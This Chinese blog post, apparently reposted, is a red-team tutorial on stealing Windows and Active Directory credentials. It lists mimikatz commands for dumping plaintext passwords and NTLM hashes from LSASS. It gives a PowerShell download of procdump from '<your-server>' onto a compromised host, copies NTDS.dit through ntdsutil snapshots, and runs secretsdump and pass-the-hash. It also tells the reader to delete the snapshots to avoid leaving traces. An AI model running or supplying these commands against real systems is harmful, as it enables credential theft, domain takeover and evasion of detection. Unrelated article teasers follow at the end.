红蓝对抗之系统密码提取

news/2025/2/9 13:41:42/文章来源:https://www.cnblogs.com/tabliu/p/18706068

mimikatz

mimikatz工具从内存中提取明文密码,HASH值,PIN密码和票据,利用zerologon漏洞(通过NetLogon/MS-NRPC协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码设置为空。

mimikatz 需要管理员或 SYSTEM 权限,通常使用 DEBUG 权限执行某些操作,与 LSASS 进程(取决于所做的操作的要求)进行交互。

mimikatz与凭证

在用户登录之后,会生成很多凭证数据并存储在本地安全权限服务的进程(LSASS)内存中。其目的是为了方便单点登录(SSO)在每次对资源进行访问请求时确保用户不会被提示。

凭证数据包括 NTLM 密码哈希,LM 密码哈希(如果密码长度小于 15 个字符),甚至明文密码(以支持其他的 WDigest 和 SSP 认证)。虽然可以阻止 Windows 创建 LM 哈希到本地计算机的 SAM 数据库(或 AD 数据库),但这并不能阻止系统在内存中生成 LM 哈希。

常用命令

system::user               //查看当前登录的用户 
process::list              //列出进程
process::stop processname  //结束进程(有些进程结束不了,即使权限够大)
process::suspend  processname //暂停进程
process::modules              //列出系统核心模块和其所在的物理路径
service::list                 //列出系统服务
service::stop (start) service_name   //停止(开启)服务
privilege::list               //列出系统权限列表
privilege::debug              //提升权限 (执行这条命令得有足够的权限)
nogpo::cmd                    //打开cmd
nogpo::regedit                //打开注册表
ts::sessions                  //显示当前回话
ts::processes                 //显示当前进程及其PID
sekurlsa::logonpasswords      //获取当前在线用户的明文密码(需要高权限运行)
lsadump::lsa /patch           //获取当前此计算机存在过用户的NTLMHASH
inject::process lsass.exe '路径' sekurlsa.dll //进程注入(如果用1.0版本获取hash的时候发现sekurlsa模块存  

远程连接使用

控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行mimikatz.exe

运行下面指令,即可得到当前内网中的所有密码

privilege::debug           //提升权限
sekurlsa::logonpasswords   //抓取密码//非交互式shell中
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt 

本地使用

mimikatz是从 lsass.exe进程中获取windows的账号及密码的,
如果对方安装了防火墙,我们可以帮对方安装一个procdump64.exe,然后从 lsass.exe进程里导出一个包含账号密码信息的lsass.dmp 文件,再把这个dmp文件传回来,最后在自己的环境下运行mimikatz,从dmp文件里读取信息。

1.下载procdump64.exe 
powershell环境下:Invoke-WebRequest -Uri "http://<your-server>/procdump64.exe" -OutFile "C:\Windows\Temp\procdump64.exe"  2.从procdump64.exe里导出lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp  3.将lsass.dmp传回本地 4.使用本地的mimikatz.exe读取lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit  为了方便复制与查看,可以输出到本地文件里面:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" > pssword.txt

读取域控成员HASH

域控本地读取

读取域控本地哈希是指直接从域控制器(Domain Controller)上获取NTDS.DIT 文件中存储的用户密码哈希(包括域用户和域管理员的哈希),该文件存储了所有与Active Directory相关的账户信息。(在域控上以域管理员身份执行mimikatz)

本地直接执行

Copy#提升权限
privilege::debug抓取hash密码
lsadump::lsa /patch

命令比较
通过 dcsync,利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值,可以在域管权限下执行获取

通过 DCSync和目录复制服务(DRS) 从 NTDS.DIT 文件中检索密码哈希值的操作,即你可以通过模拟域控制器(Domain Controller)与其他域控制器之间的复制通信来提取 Active Directory 中的用户密码哈希,甚至包括域管理员账户的哈希

DCSync:
DCSync 是 Mimikatz 工具中的一个功能,允许攻击者模拟域控制器的复制请求(通常用于从一个域控制器到另一个域控制器同步数据),以此来获取 NTDS.DIT 文件中的敏感信息,特别是 密码哈希。

当攻击者具备足够权限时,他们可以请求复制域控制器上的 Active Directory 数据库(NTDS.DIT),其中包括用户的密码哈希。

NTDS.DIT 文件:
NTDS.DIT是Active Directory 数据库文件,存储了域内所有用户、计算机和组的账户信息,包括密码哈希。

这个文件对域控制器非常重要,因为它包含了域内所有身份验证所需的用户数据。
目录复制服务(DRS):
目录复制服务(Directory Replication Service, DRS)是用于将 Active Directory 中的更改从一个域控制器复制到其他域控制器的机制。

导出域成员哈希

导出域成员哈希是指从域成员计算机(即非域控制器的其他计算机)上提取域账户的NTLM哈希,通常这类计算机已加入到域中。

域账户的用户名和hash密码以域数据库的形式存放在域控制器的%SystemRoot%\ntds\NTDS.DIT文件中。
这里可以借助ntdsutil.exe,域控制器自带的域数据库管理工具,我们可以通过域数据库,提取出域中所有的域用户信息,在域控上依次执行如下命令,导出域数据库:

#创建快照
ntdsutil snapshot "activate instance ntds" create quit quit#加载快照
ntdsutil snapshot "mount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit#Copy文件副本
copy C:\$SNAP_201911211122_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

将ntds.dit文件拷贝到本地利用impacket脚本dump出Hash:

Copysecretsdump.py -ntds.dit -system system.hive LOCAL

最后记得卸载删除快照(避免留痕)

ntdsutil snapshot "unmount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
ntdsutil snapshot "delete  {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit

我们对两种不同方法进行比较:
两者比较

secretsdump脚本直接导出域hash

secretsdump.py是Impacket工具集中的一个脚本,用于直接导出域内用户的哈希。这里的操作更简单粗暴,因为它省去了手动复制文件和创建快照的步骤

Copypython secretsdump.py rabbitmask:123456@192.168.15.181 (domain:password@ip)

首先它会导出本地SAM中的hash,然后是所有域内用户的IP,全部获取成功

哈希传递

privilege::debug    #先提权
#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:用户名  /domain:目标机器IP  /ntlm:密码哈希

提权:
提权
攻击完成后,查看权限:

dir \\dc.sun.com\c$
#也可以ip查看
dir \\192.168.1.5\c$

查看权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/881212.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

wsl启动报错Cannot execute daemonize to start systemd的解决方法

WSL 启动报错 "Cannot execute daemonize to start systemd" 的解决方法 问题背景 在启动 WSL2 时遇到以下错误: Cannot execute daemonize to start systemd解决思路来源:https://github.com/DamionGans/ubuntu-wsl2-systemd-script/issues/37此错误通常是因为 dae…

2.2-2.9做题笔记

2.2 - 2.9 做题笔记 最近一周做的所有题目,包括 cyezoj 上的模拟赛,专题作业和 ABC。 2.4 CYEZ SHOI2025 模拟测试七 CYEZ 404 过桥 题目难度:省选 D1T1 赛时:20pts ;订正:100pts 大意 有 \(n\) 个人要过一座每次最多容 \(c\) 人通过、且仅有一只手电的一座桥。多人同时过…

【烂笔头系列】计算广告笔记16-其他广告相关技术

创意优化 创意需要将向用户推送广告的关键原因明确表达出来 程序化创意地域性创意 搜索重定向创意 个性化重定向创意电机热力图电机热力图是将某一个创意各位置被点击的密度用热力图方式呈现,帮助创意优化者直观的发现和解决其中的问题创意的发展趋势视频化激励视频形式交互化…

【烂笔头系列】推荐系统笔记10-经典深度学习推荐模型

特征组合和特征交叉问题非常常见,特征的种类非常多,特征交叉的复杂程度也要大得多。解决这类问题的关键,就是模型对于特征组合和特征交叉的学习能力,因为它决定了模型对于未知特征组合样本的预测能力,而这对于复杂的推荐问题来说,是决定其推荐效果的关键点之一。 那特征交…

【烂笔头系列】推荐系统笔记09-深度学习推荐模型发展脉络

1. 深度学习模型拟合能力更强 特征交叉方式中,点积等方式过于简单,在样本数据比较复杂的情况下,容易欠拟合。而深度学习可以大大提高模型的拟合能力,比如在 NeuralCF(神经网络协同过滤)模型中,点积层被替换为多层神经网络,理论上多层神经网络具备拟合任意函数的能力,所…

【烂笔头系列】推荐系统笔记12-模型评估

1. 离线评估 (1)介绍 离线评估是最常用、最基本的。顾名思义就是:我们将模型部署于线上环境之前,在离线环境下进行的评估。由于不用部署到生产环境,“离线评估”没有线上部署的工程风险,也不会浪费宝贵的线上流量资源,而且具有测试时间短,可多组并行,以及能够利用丰富…

【烂笔头系列】推荐系统笔记05-Embedding技术

1. Embedding是什么 Embedding 就是用一个数值向量“表示”一个对象(Object)的方法解读1:左边例子,从 king 到 queen 的向量和从 man 到 woman 的向量,无论从方向还是尺度来说它们都非常接近。 解读2:右边例子也很典型,从 walking 到 walked 和从 swimming 到 swam 的向…

【烂笔头系列】推荐系统笔记04-推荐系统有哪些可以利用的特征

1. 特征与工程 (1)特征就是对具体行为的抽象,但是抽象过程会造成信息的损失 ① 因为具体的推荐行为和场景中包含大量原始的场景、图片和状态信息,保存所有信息的存储空间过大,我们根本无法实现。 ② 因为具体的推荐场景中包含大量冗余的、无用的信息,把它们都考虑进来甚至…

1.AI 大模型的基本概念

1.目前AI 行业分类 2023年, AI 分 传统AI(机器学习、深度学习、强化学习) AI算法工程师 AI大模型(AI2.0)神经网络,自注意机制,Transform机制 AI应用开发工程师 2.什么是AI 大模型(LLM) 参数大,训练的数据集大 3.AI大模型最终价值 TOB 和 TOC 的应用 4.A…

【烂笔头系列】小红书推荐系统学习笔记06-冷启动

物品冷启动评价指标 物品冷启动目标精准推荐:新物品的推荐效果往往比较差 激励发布:新物品得到较多流量后,更容易激励作者。 挖掘高潜:从新物品中挖掘高质量物品。评价指标作者指标:发布渗透量、人均发布量等 用户指标:新笔记的交互率、大盘指标(比如日活、月活、时长)…

【烂笔头系列】小红书推荐系统学习笔记05-重排

重排是精排的后处理操作。 物品多样性 相似度度量基于物品属性标签基于物品向量表征 (1)双塔模型的物品塔,但是因为头部效应问题导致学不好物品向量表征 (2)基于图文内容学习CLIP - 基于图文内容的物品向量表征 原理 对于图片-文本二元组数据进行对比学习,预测图文是否匹…

小红书推荐系统学习笔记02-排序

精排 - 多目标模型 简单的多目标模型 模型结构损失函数和训练问题 数据集通常是类别及不平衡的,比如总共1000次曝光,其中只有100次点击,10次收藏,收藏次数对于曝光来说相差极大。 解决方案:通常使用负样本降采样的方法。 预估校准:负样本降采样之后,就改变了各个目标的实…